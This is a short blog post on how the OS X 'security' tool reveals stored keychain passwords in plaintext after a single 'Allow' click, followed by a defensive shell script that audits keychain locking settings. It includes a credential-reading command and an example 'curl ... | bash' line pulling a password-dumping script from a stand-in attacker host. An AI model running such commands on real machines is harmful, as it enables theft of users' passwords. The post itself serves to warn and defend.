Most people know that you can get the cleartext password stored in the OS X “login” keychain by opening the “Keychain Access” app, navigating to the entry and entering your account’s password:
What I didn’t realize until recently is that this is just an artificial barrier introduced by Apple that doesn’t really have any effect. Let me demonstrate by first creating an example account:
Now we will retrieve the password in plaintext, without entering the account’s password, with the help of /usr/bin/security, which should come with every recent OS X:

$ /usr/bin/security \
    find-internet-password -g \
    -a timcook \
    -s security.apple.com
The only thing that stands between whoever has access to your terminal and the plaintext password is a single click on “Allow”:
keychain: "/Users/lucas/Library/Keychains/login.keychain"
class: "inet"
attributes:
    [...]
    "acct"="timcook"
    [...]
    "srvr"="security.apple.com"
password: " "
The bottom line is that, if you leave your Mac unlocked and unattended for even a few minutes, you can basically consider all your passwords compromised. For example, somebody could fire up a terminal and run
$ curl http://badperson.com/get-passwords.sh | bash
which could dump all your keychain’s passwords and post them back to the attacker’s server. This would take between 10 and 30 seconds depending on their typing speed.
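One practical mitigation on the defender’s side is to make the login keychain lock itself on sleep and after a short idle timeout, so an unattended but unlocked Mac no longer hands out every stored password with one click on “Allow”. The following script is an added example (not from the original post): it classifies the line printed by `security show-keychain-info`, checks it against a maximum idle timeout, and, when run on a Mac, audits the real login keychain. The output format shown in the comments (`lock-on-sleep`, `timeout=300s`, `no-timeout`) and the `login.keychain` name are assumptions to check against your own machine.

```shell
#!/bin/sh
# Added example, not code from the original post.
# Assumed output of `security show-keychain-info login.keychain`:
#   Keychain "login.keychain" lock-on-sleep timeout=300s
#   Keychain "login.keychain" no-timeout
# (assumption; verify on your own machine).

# Classify one show-keychain-info line. Prints one of:
#   locked-on-sleep-and-timeout | timeout-only | sleep-only | never-locks
keychain_lock_policy() {
    line=$1
    case "$line" in
        *lock-on-sleep*timeout=*) echo "locked-on-sleep-and-timeout" ;;
        *timeout=*)               echo "timeout-only" ;;
        *lock-on-sleep*)          echo "sleep-only" ;;
        *)                        echo "never-locks" ;;
    esac
}

# Extract the idle timeout in seconds from a line (0 if there is none).
keychain_timeout_seconds() {
    line=$1
    case "$line" in
        *timeout=*) echo "$line" | sed -n 's/.*timeout=\([0-9]*\)s.*/\1/p' ;;
        *)          echo 0 ;;
    esac
}

# Succeed (status 0) only if the keychain locks on sleep AND
# after at most $2 seconds of inactivity.
keychain_policy_ok() {
    line=$1
    max=$2
    [ "$(keychain_lock_policy "$line")" = "locked-on-sleep-and-timeout" ] || return 1
    [ "$(keychain_timeout_seconds "$line")" -le "$max" ]
}

# On a Mac: inspect the real login keychain and report whether it
# meets the policy. Returns 2 when security(1) is not available
# (e.g. when run on Linux), 1 when the policy is too weak.
audit_login_keychain() {
    if ! command -v security >/dev/null 2>&1; then
        echo "security(1) not found; not running on OS X" >&2
        return 2
    fi
    info=$(security show-keychain-info login.keychain 2>&1)
    if keychain_policy_ok "$info" 300; then
        echo "ok: $info"
    else
        echo "weak: $info"
        # To harden (assumed flags of security(1): -l lock on sleep,
        # -u lock after timeout, -t timeout in seconds):
        #   security set-keychain-settings -l -u -t 300 login.keychain
        return 1
    fi
}
```

Run `audit_login_keychain` from a terminal on the Mac in question; a “weak” result means the keychain stays unlocked indefinitely once it has been opened, which is exactly the state the curl-pipe-bash scenario above relies on. A locked keychain still prompts for the account password before `security find-internet-password -g` will return anything.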
Note: I don’t really feel qualified to discuss whether there is a better way to handle this, because, you know, having to enter your password all the time sucks too. I just wanted to point out that whoever has access to your terminal can be considered to have access to all your passwords.
Let me know what you think!